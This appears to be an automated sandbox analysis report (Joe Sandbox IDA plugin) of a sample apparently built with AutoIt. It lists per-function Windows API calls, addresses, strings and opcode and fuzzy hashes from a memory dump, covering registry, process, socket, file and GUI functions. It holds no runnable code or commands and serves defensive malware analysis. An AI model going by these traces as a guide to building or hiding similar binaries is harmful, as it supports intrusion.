                                                                        • Instruction ID: 1cd3560adc4b2c63e6bf7de9a928c2b3c8f76b792217bf8131409a5cd08bdc30
                                                                        • Opcode Fuzzy Hash: 38608913f7489aedff141b1845becee785de4589372cf6e22cdf1c589b10c564
                                                                        • Instruction Fuzzy Hash: 133129B2915109BFDB15DB91DC8AAFFB7BCEF09341F00416AE912E2150D6749F8C9BA0
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00935FA6,?), ref: 00936EF1
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00935FC9
                                                                        • _wcscmp.LIBCMT ref: 00935FE7
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00936000
                                                                          • Part of subcall function 00936318: GetFileAttributesW.KERNEL32(?,?,?,?,009360C3), ref: 00936369
                                                                          • Part of subcall function 00936318: GetLastError.KERNEL32(?,?,?,009360C3), ref: 00936374
                                                                          • Part of subcall function 00936318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009360C3), ref: 00936388
                                                                        • _wcscat.LIBCMT ref: 00936042
                                                                        • SHFileOperationW.SHELL32 ref: 009360AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$FullNamePath$AttributesCreateDirectoryErrorLastMoveOperation_wcscat_wcscmplstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 1724171360-1173974218
                                                                        • Opcode ID: 5716471696b6b9cabd176b1dea1ea046d076b3328f90696da1b6f92e188e514b
                                                                        • Instruction ID: fdf195fb63787ee941cdb51a87eb0e5c084b5c9085df1295514fdc9c7a734c90
                                                                        • Opcode Fuzzy Hash: 5716471696b6b9cabd176b1dea1ea046d076b3328f90696da1b6f92e188e514b
                                                                        • Instruction Fuzzy Hash: 37311D72D0431D9ADF25DBA4C849FEE73B9AF4C304F0440AAA809E3152EA74D689CF91
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00958FE7
                                                                        • GetWindowLongW.USER32(0102D148,000000F0), ref: 0095901A
                                                                        • GetWindowLongW.USER32(0102D148,000000F0), ref: 0095904F
                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00959081
                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009590AB
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 009590BC
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009590D6
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        • Opcode ID: 710a7af325e35318dc90abef1b3b5893a495cb71e4ff18e765af459eb490560d
                                                                        • Instruction ID: 6129f438f399771cfb4e94333b5b66f1e0a31bea26412aa8de8b89be1b913fcb
                                                                        • Opcode Fuzzy Hash: 710a7af325e35318dc90abef1b3b5893a495cb71e4ff18e765af459eb490560d
                                                                        • Instruction Fuzzy Hash: 7F314435618214EFEB20CF69DC88F6537B9FB8A365F140264F9198B2F1CB71A844EB40
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009308F2
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00930918
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0093091B
                                                                        • SysAllocString.OLEAUT32(?), ref: 00930939
                                                                        • SysFreeString.OLEAUT32(?), ref: 00930942
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00930967
                                                                        • SysAllocString.OLEAUT32(?), ref: 00930975
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 783d8dba7601d9606205ccb9feb4f54c2faf801fa8b39848c000e5fdbf53a9c3
                                                                        • Instruction ID: 81975f1e8db5c2f3b2b15899d42025f61db2f1df52a163e036f518eef88df454
                                                                        • Opcode Fuzzy Hash: 783d8dba7601d9606205ccb9feb4f54c2faf801fa8b39848c000e5fdbf53a9c3
                                                                        • Instruction Fuzzy Hash: 5121B572605208AFEB109F68CC88EBB73BCEF49760B008525F909DB1A1D674ED418B60
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: 19dc6ceb6df64f01b5ae5a7ec71d8a4506c9495826fe366fed67aae75b8ed900
                                                                        • Instruction ID: c68ccf437a4693fc8350ead072ec448c7806f66335b858f80ecdba9d5c8e4543
                                                                        • Opcode Fuzzy Hash: 19dc6ceb6df64f01b5ae5a7ec71d8a4506c9495826fe366fed67aae75b8ed900
                                                                        • Instruction Fuzzy Hash: 1F21377220821577C720AB349C16FBB73ADEFA5310F508429F546D71C1E765AA82CB95
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009309CB
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009309F1
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 009309F4
                                                                        • SysAllocString.OLEAUT32 ref: 00930A15
                                                                        • SysFreeString.OLEAUT32 ref: 00930A1E
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00930A38
                                                                        • SysAllocString.OLEAUT32(?), ref: 00930A46
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 4a716dbf9bc55718457ce7531772e93d8576f5eccc7fec5aed8dc6349b9535af
                                                                        • Instruction ID: 535a817558479440c8ef5f140b2bd5543ce6795de16a9cc639fd59708f1b5819
                                                                        • Opcode Fuzzy Hash: 4a716dbf9bc55718457ce7531772e93d8576f5eccc7fec5aed8dc6349b9535af
                                                                        • Instruction Fuzzy Hash: 28219876215204AFDB10DFB8DC99DBB77ECEF49360B408125F909CB2A1D674EC819B64
                                                                        APIs
                                                                          • Part of subcall function 0090D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                          • Part of subcall function 0090D17C: GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                          • Part of subcall function 0090D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0095A32D
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0095A33A
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0095A345
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0095A354
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0095A360
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: c1320d00fc05fa5ac25ad4d91f85e5cd62bd2d722a1be88f9d8db9750d702328
                                                                        • Instruction ID: 3c461d5f9f1606f309dc839ac7c7064f9e368d510c51f97b6b1a4ba5ff27b6a6
                                                                        • Opcode Fuzzy Hash: c1320d00fc05fa5ac25ad4d91f85e5cd62bd2d722a1be88f9d8db9750d702328
                                                                        • Instruction Fuzzy Hash: 0D11D0B1110219BEEF149FA1CC85EEB7F6DFF48398F014214BA08A60A0C6729C21DBA4
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 0090CCF6
                                                                        • GetWindowRect.USER32(?,?), ref: 0090CD37
                                                                        • ScreenToClient.USER32(?,?), ref: 0090CD5F
                                                                        • GetClientRect.USER32(?,?), ref: 0090CE8C
                                                                        • GetWindowRect.USER32(?,?), ref: 0090CEA5
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$Screen
                                                                        • String ID:
                                                                        • API String ID: 1296646539-0
                                                                        • Opcode ID: a3620fb393fff95ad08fc9ac30f49a31e09e26aedb188ecd70a6673ffb43e738
                                                                        • Instruction ID: fd58dabda665edc6a2adecd6c36e6555946eb5686987182be1e3449bca6730aa
                                                                        • Opcode Fuzzy Hash: a3620fb393fff95ad08fc9ac30f49a31e09e26aedb188ecd70a6673ffb43e738
                                                                        • Instruction Fuzzy Hash: 53B128B9900249DFDF10CFA8C5847EEBBB5FF08350F149629EC59AB290DB34A950DB64
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00951C18
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00951C26
                                                                        • __wsplitpath.LIBCMT ref: 00951C54
                                                                          • Part of subcall function 00911DFC: __wsplitpath_helper.LIBCMT ref: 00911E3C
                                                                        • _wcscat.LIBCMT ref: 00951C69
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00951CDF
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00951CF1
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1380811348-0
                                                                        • Opcode ID: 4ae9bc777a2bf4ac47834e05a062fe7f4427570335c213b4bedb888b8e578690
                                                                        • Instruction ID: 359151ea088231c7539b9c6a250600553670f83c52b22582cdc67f99de36f95c
                                                                        • Opcode Fuzzy Hash: 4ae9bc777a2bf4ac47834e05a062fe7f4427570335c213b4bedb888b8e578690
                                                                        • Instruction Fuzzy Hash: 58513E715083449FD720EF24D885FABB7ECEF88754F00491EF98A97291EB709A45CB92
                                                                        APIs
                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009530AF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009530EF
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00953112
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0095313B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0095317E
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0095318B
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3451389628-0
                                                                        • Opcode ID: 088c942d47ba836f99b4986972d9f6d190a598271a2d58cc8605dddf5458cd40
                                                                        • Instruction ID: 9f7fdd5213bf86ab782675853f95808ffde03c41a2ba01697162c03fa751265e
                                                                        • Opcode Fuzzy Hash: 088c942d47ba836f99b4986972d9f6d190a598271a2d58cc8605dddf5458cd40
                                                                        • Instruction Fuzzy Hash: 19515B31208304AFC700EF69C885E6AB7F9FF89344F04891DFA55972A1DB31EA09CB52
                                                                        APIs
                                                                        • GetMenu.USER32(?), ref: 00958540
                                                                        • GetMenuItemCount.USER32(00000000), ref: 00958577
                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0095859F
                                                                        • GetMenuItemID.USER32(?,?), ref: 0095860E
                                                                        • GetSubMenu.USER32(?,?), ref: 0095861C
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0095866D
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                        • String ID:
                                                                        • API String ID: 650687236-0
                                                                        • Opcode ID: f41bc4feb1240cb6be5baaf1cf851da71aa57e56201b8d67a07c3808db7ee0cf
                                                                        • Instruction ID: 7933c4db662f5e134f64c5484bb7908138810ccd4eff7d04b2d5cd9a6ce7a6b7
                                                                        • Opcode Fuzzy Hash: f41bc4feb1240cb6be5baaf1cf851da71aa57e56201b8d67a07c3808db7ee0cf
                                                                        • Instruction Fuzzy Hash: DE519C71A01219AFCB11EFA9C845AAEB7F8FF48310F104499FD05BB391DB34AE458B91
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00934B10
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00934B5B
                                                                        • IsMenu.USER32(00000000), ref: 00934B7B
                                                                        • CreatePopupMenu.USER32 ref: 00934BAF
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00934C0D
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00934C3E
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: 4b77f9f825d54ae5a12cddb68838127f5e277857b34ea3f660362be9bf8d79f4
                                                                        • Instruction ID: 6aaaff51eb76a7b92ac9f39807e98aeb00690e68e02f3bbf33cb43e01497a009
                                                                        • Opcode Fuzzy Hash: 4b77f9f825d54ae5a12cddb68838127f5e277857b34ea3f660362be9bf8d79f4
                                                                        • Instruction Fuzzy Hash: 7651C070A02209EFDF20CF68D888BEDBBF8EF44318F154159E4959B291D375A984CF51
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0098DC00), ref: 00948E7C
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948E89
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00948EAD
                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00948EC5
                                                                        • _strlen.LIBCMT ref: 00948EF7
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948F6A
                                                                        Similarity
                                                                        • API ID: ErrorLast$_strlenselect
                                                                        • String ID:
                                                                        • API String ID: 2217125717-0
                                                                        • Opcode ID: ad4f8de9b7c15ebeb6b7eb616f1fae77e22d44c3de81c0821d4a1b021b9921fa
                                                                        • Instruction ID: bae0ed4f3fcd2a0ba19ace1da8cdd8377dc58448bceff54f79c1f35273e09cf7
                                                                        • Opcode Fuzzy Hash: ad4f8de9b7c15ebeb6b7eb616f1fae77e22d44c3de81c0821d4a1b021b9921fa
                                                                        • Instruction Fuzzy Hash: 30417171500208AFCB18EB68CD96EAEB7B9EF58314F104699F51AD72D1DF30AE44CB61
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • BeginPaint.USER32(?,?,?), ref: 0090AC2A
                                                                        • GetWindowRect.USER32(?,?), ref: 0090AC8E
                                                                        • ScreenToClient.USER32(?,?), ref: 0090ACAB
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0090ACBC
                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 0090AD06
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0096E673
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 2592858361-0
                                                                        • Opcode ID: 66e01eeb5caac14374619bcb667210af17f2d4db8c3a5f3786366a12e43327e9
                                                                        • Instruction ID: ef004cd69913ae2880acbb668a62f5c2319623e8e6b23af575116f4a800185ec
                                                                        • Opcode Fuzzy Hash: 66e01eeb5caac14374619bcb667210af17f2d4db8c3a5f3786366a12e43327e9
                                                                        • Instruction Fuzzy Hash: 8B419F71109300DFD710DF24DC84FAA7BB8AF55730F140669F9A8862E1C731A885EBA2
                                                                        APIs
                                                                        • ShowWindow.USER32(009B1628,00000000,009B1628,00000000,00000000,009B1628,?,0096DC5D,00000000,?,00000000,00000000,00000000,?,0096DAD1,00000004), ref: 0095E40B
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0095E42F
                                                                        • ShowWindow.USER32(009B1628,00000000), ref: 0095E48F
                                                                        • ShowWindow.USER32(00000000,00000004), ref: 0095E4A1
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 0095E4C5
                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0095E4E8
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: d2b93c64bbe20cc15c691dfb6e6f9cbbff4e4a3d2a7e1d1c8cb51ccdd73c730d
                                                                        • Instruction ID: 0ee9be81aa77b1475759c9d0d924a89aa1ef2bf2a6f1731262788340f8f529de
                                                                        • Opcode Fuzzy Hash: d2b93c64bbe20cc15c691dfb6e6f9cbbff4e4a3d2a7e1d1c8cb51ccdd73c730d
                                                                        • Instruction Fuzzy Hash: 8F413D31605140EFDB2ACF25C499B947BE5BF09306F1841B9EE5C8F2B2C732A989CB51
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 009398D1
                                                                          • Part of subcall function 0090F4EA: std::exception::exception.LIBCMT ref: 0090F51E
                                                                          • Part of subcall function 0090F4EA: __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00939908
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00939924
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0093999E
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009399B3
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 009399D2
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 2537439066-0
                                                                        • Opcode ID: 9acb793f3cff4a0e716905ab3721d9dc223af635b0e7e79b6225a69327e23e71
                                                                        • Instruction ID: 37f52e01f0dfd339b5b2781d2e9fc8ff9cf632aebc93f4aa9867ffbba19bae08
                                                                        • Opcode Fuzzy Hash: 9acb793f3cff4a0e716905ab3721d9dc223af635b0e7e79b6225a69327e23e71
                                                                        • Instruction Fuzzy Hash: B9317032A00105EFDB10AF94DC85B6AB778FF85710B1480A9F909AB296D774DA54DBA0
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,009477F4,?,?,00000000,00000001), ref: 00949B53
                                                                          • Part of subcall function 00946544: GetWindowRect.USER32(?,?), ref: 00946557
                                                                        • GetDesktopWindow.USER32 ref: 00949B7D
                                                                        • GetWindowRect.USER32(00000000), ref: 00949B84
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00949BB6
                                                                          • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
                                                                        • GetCursorPos.USER32(?), ref: 00949BE2
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00949C44
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: daabcaf2d8ba89bc321f0b2233d1d1f2ebf60ba9f0ae1c6823dfbe27606abd26
                                                                        • Instruction ID: 97c27b635d170ed5f9c6da364eda807fe33c0e2a6f4871adf0f5f0a95787db8d
                                                                        • Opcode Fuzzy Hash: daabcaf2d8ba89bc321f0b2233d1d1f2ebf60ba9f0ae1c6823dfbe27606abd26
                                                                        • Instruction Fuzzy Hash: 7131BCB2108309ABD720DF549849F9BB7EDFF89314F00091AF589E7181DA31EA44CB92
                                                                        APIs
                                                                          • Part of subcall function 0090AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0090AFE3
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090AFF2
                                                                          • Part of subcall function 0090AF83: BeginPath.GDI32(?), ref: 0090B009
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090B033
                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0095EC20
                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0095EC34
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095EC42
                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0095EC52
                                                                        • EndPath.GDI32(00000000), ref: 0095EC62
                                                                        • StrokePath.GDI32(00000000), ref: 0095EC72
                                                                        Similarity
                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                        • String ID:
                                                                        • API String ID: 43455801-0
                                                                        • Opcode ID: aa75c3b10307ed6954c40f31ac1ea8afb66fdc1df72699b92d23751e43a1b99a
                                                                        • Instruction ID: e1d09cbd40b33ac56b68a1c0d4e868564248a3fdf0ca63464024918b6c4ea4ae
                                                                        • Opcode Fuzzy Hash: aa75c3b10307ed6954c40f31ac1ea8afb66fdc1df72699b92d23751e43a1b99a
                                                                        • Instruction Fuzzy Hash: DC110972005149BFEB029F90DD88FEA7F6DEF08360F048112BE0889160D7719E95EBA0
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0092E1C0
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0092E1D1
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0092E1D8
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0092E1E0
                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0092E1F7
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0092E209
                                                                          • Part of subcall function 00929AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00929A05,00000000,00000000,?,00929DDB), ref: 0092A53A
                                                                        Similarity
                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                        • String ID:
                                                                        • API String ID: 603618608-0
                                                                        • Opcode ID: 9f20f0bb10379990551dcab94d0ddff5ad65cdf6e58e5945d0c9ea38a54e58d4
                                                                        • Instruction ID: be18849777e49270c4c826744f01c1692028a25320b3e55f00bac700708af7bd
                                                                        • Opcode Fuzzy Hash: 9f20f0bb10379990551dcab94d0ddff5ad65cdf6e58e5945d0c9ea38a54e58d4
                                                                        • Instruction Fuzzy Hash: 5B018FB6A04314BFEB109BA69C45F5EBFB8EF48351F004066EA08A7391DA719C00CBA0
                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 00917B47
                                                                          • Part of subcall function 0091123A: __initp_misc_winsig.LIBCMT ref: 0091125E
                                                                          • Part of subcall function 0091123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00917F51
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00917F65
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00917F78
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00917F8B
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00917F9E
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00917FB1
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00917FC4
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00917FD7
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00917FEA
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00917FFD
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00918010
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00918023
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00918036
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00918049
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0091805C
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0091806F
                                                                        • __mtinitlocks.LIBCMT ref: 00917B4C
                                                                          • Part of subcall function 00917E23: InitializeCriticalSectionAndSpinCount.KERNEL32(009AAC68,00000FA0,?,?,00917B51,00915E77,009A6C70,00000014), ref: 00917E41
                                                                        • __mtterm.LIBCMT ref: 00917B55
                                                                          • Part of subcall function 00917BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00917B5A,00915E77,009A6C70,00000014), ref: 00917D3F
                                                                          • Part of subcall function 00917BBD: _free.LIBCMT ref: 00917D46
                                                                          • Part of subcall function 00917BBD: DeleteCriticalSection.KERNEL32(009AAC68,?,?,00917B5A,00915E77,009A6C70,00000014), ref: 00917D68
                                                                        • __calloc_crt.LIBCMT ref: 00917B7A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00917BA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 2942034483-0
                                                                        • Opcode ID: 9bc2e26d9778d2f8434386066c0defa742937a33c81cd62aa9c371795c6fedcb
                                                                        • Instruction ID: 121ba200ad40f73c0e3a97b22eae91ff1b43a7fb860c2d27ed9eaeed4d305e50
                                                                        • Opcode Fuzzy Hash: 9bc2e26d9778d2f8434386066c0defa742937a33c81cd62aa9c371795c6fedcb
                                                                        • Instruction Fuzzy Hash: 22F0963275D31B1AE62477F47C067CAA6F89F82734B2046A9F864C60E1FF2588C181A1
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F281D
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 008F2825
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F2830
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F283B
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 008F2843
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008F284B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: 745cfc0459ca67293f12df35c1329b22dca492100cb72c48344e72129a9f1333
                                                                        • Instruction ID: 69a5b22dff1777c3cdda3331829ff9fd8f23b70fe5f1ffea40167ec62d5af65b
                                                                        • Opcode Fuzzy Hash: 745cfc0459ca67293f12df35c1329b22dca492100cb72c48344e72129a9f1333
                                                                        • Instruction Fuzzy Hash: 930167B1902B5ABDE3008F6A8C85B52FFB8FF59354F00411BA15C47A42C7F5A864CBE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
